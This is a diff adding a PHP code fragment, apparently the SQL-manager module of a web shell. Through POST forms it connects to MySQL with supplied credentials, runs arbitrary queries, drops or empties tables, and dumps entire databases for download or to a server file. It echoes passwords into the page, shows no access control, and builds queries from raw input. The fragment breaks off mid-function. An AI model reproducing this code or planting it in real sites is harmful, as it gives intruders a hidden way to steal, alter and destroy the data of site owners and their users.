+if ($act == "sql")
+{
+ echo("<form name='sql' method='POST'><input name='act' type='hidden' value='sql'><input name='sql_tbl_insert_q' type='hidden' value=''><input name='sql_login' type='hidden' value=''><input name='kill' type='hidden' value=''><input name='sql_order' type='hidden' value=''><input name='sql_tbl_ls' type='hidden' value=''><input name='sql_tbl_le' type='hidden' value=''><input name='sql_tbl_act' type='hidden' value=''><input name='thistbl' type='hidden' value=''><input name='sql_passwd' type='hidden' value=''><input name='sql_server' type='hidden' value=''><input name='sql_port' type='hidden' value=''><input name='sql_db' type='hidden' value=''><input name='sql_act' type='hidden' value=''><input name='sql_tbl' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''><input name='sql_query' type='hidden' value=''></form>");
+
+ if (isset($_POST['sql_login']))  {$sql_login=htmlspecialchars($_POST['sql_login']);}
+ if (isset($_POST['sql_passwd'])) {$sql_passwd=htmlspecialchars($_POST['sql_passwd']);}
+ if (isset($_POST['sql_server'])) {$sql_server=htmlspecialchars($_POST['sql_server']);}
+ if (isset($_POST['sql_port']))   {$sql_port=htmlspecialchars($_POST['sql_port']);}
+ if (isset($_POST['sql_db']))     {$sql_db=htmlspecialchars($_POST['sql_db']);}
+ if (isset($_POST['sql_act']))     {$sql_act=htmlspecialchars($_POST['sql_act']);}
+ if (isset($_POST['sql_tbl']))     {$sql_tbl=htmlspecialchars($_POST['sql_tbl']);}
+ if (isset($_POST['sql_tbl_act']))     {$sql_tbl_act=htmlspecialchars($_POST['sql_tbl_act']);}
+ if (isset($_POST['thistbl']))     {$thistbl=htmlspecialchars($_POST['thistbl']);}
+ if (isset($_POST['sql_order']))     {$sql_order=htmlspecialchars($_POST['sql_order']);}
+ if (isset($_POST['sql_tbl_ls']))     {$sql_tbl_ls=htmlspecialchars($_POST['sql_tbl_ls']);}
+ if (isset($_POST['sql_tbl_le']))     {$sql_tbl_le=htmlspecialchars($_POST['sql_tbl_le']);}
+ if (isset($_POST['sql_query']))     {$sql_query=htmlspecialchars($_POST['sql_query']);}
+ if (isset($_POST['sql_tbl_insert_q'])) {$sql_tbl_insert_q=urldecode(htmlspecialchars($_POST['sql_tbl_insert_q']));}
+ if (isset($_POST['sql_tbl_insert_functs'])) {$sql_tbl_insert_functs=htmlspecialchars($_POST['sql_tbl_insert_functs']);}
+ if (isset($_POST['sql_tbl_insert_radio'])) {$sql_tbl_insert_radio=htmlspecialchars($_POST['sql_tbl_insert_radio']);}
+
+
+
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();");
+  $sqlquicklaunch[] = array("Query","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();");
+  $sqlquicklaunch[] = array("Server-status","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='serverstatus';document.sql.submit();");
+  $sqlquicklaunch[] = array("Server variables","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='servervars';document.sql.submit();");
+  $sqlquicklaunch[] = array("Processes","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.submit();");
+  $sqlquicklaunch[] = array("Logout","#\" onclick=\"document.sql.act.value='sql';document.sql.submit();");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="#" onclick="document.sql.act.value='sql';document.sql.sql_login.value='<?echo (htmlspecialchars($sql_login)) ?>';document.sql.sql_passwd.value='<?echo (htmlspecialchars($sql_passwd)) ?>';document.sql.sql_server.value='<?echo (htmlspecialchars($sql_server)) ?>';document.sql.sql_port.value='<?echo (htmlspecialchars($sql_port)) ?>';document.sql.submit();"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_tbl.value='".htmlspecialchars($row[0])."';document.sql.submit();\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $_SERVER['PHP_SELF']; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    $sql_query = urldecode($sql_query);
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='structure';document.sql.submit();\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='browse';document.sql.submit();\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_act.value='tbldump';document.sql.thistbl.value='1';document.sql.submit();\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='insert';document.sql.thistbl.value='1';document.sql.submit();\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $sql_query = urldecode($sql_query);
+        $sql_tbl_insert_q = urldecode($sql_tbl_insert_q);
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><input type=hidden name='sql_tbl_act' value='insert'><input type=hidden name='sql_tbl_insert_q' value='".urlencode($sql_tbl_insert_q)."'><input type=hidden name='sql_tbl_ls' value='".$sql_tbl_ls."'><input type=hidden name='sql_tbl_le' value='".$sql_tbl_le."'><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.thistbl.value='1';document.sql.sql_order.value='".htmlspecialchars($sql_order)."';document.sql.sql_tbl_ls.value='".($i*$perpage)."';document.sql.sql_tbl_le.value='".($i*$perpage+$perpage)."';document.sql.submit();\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
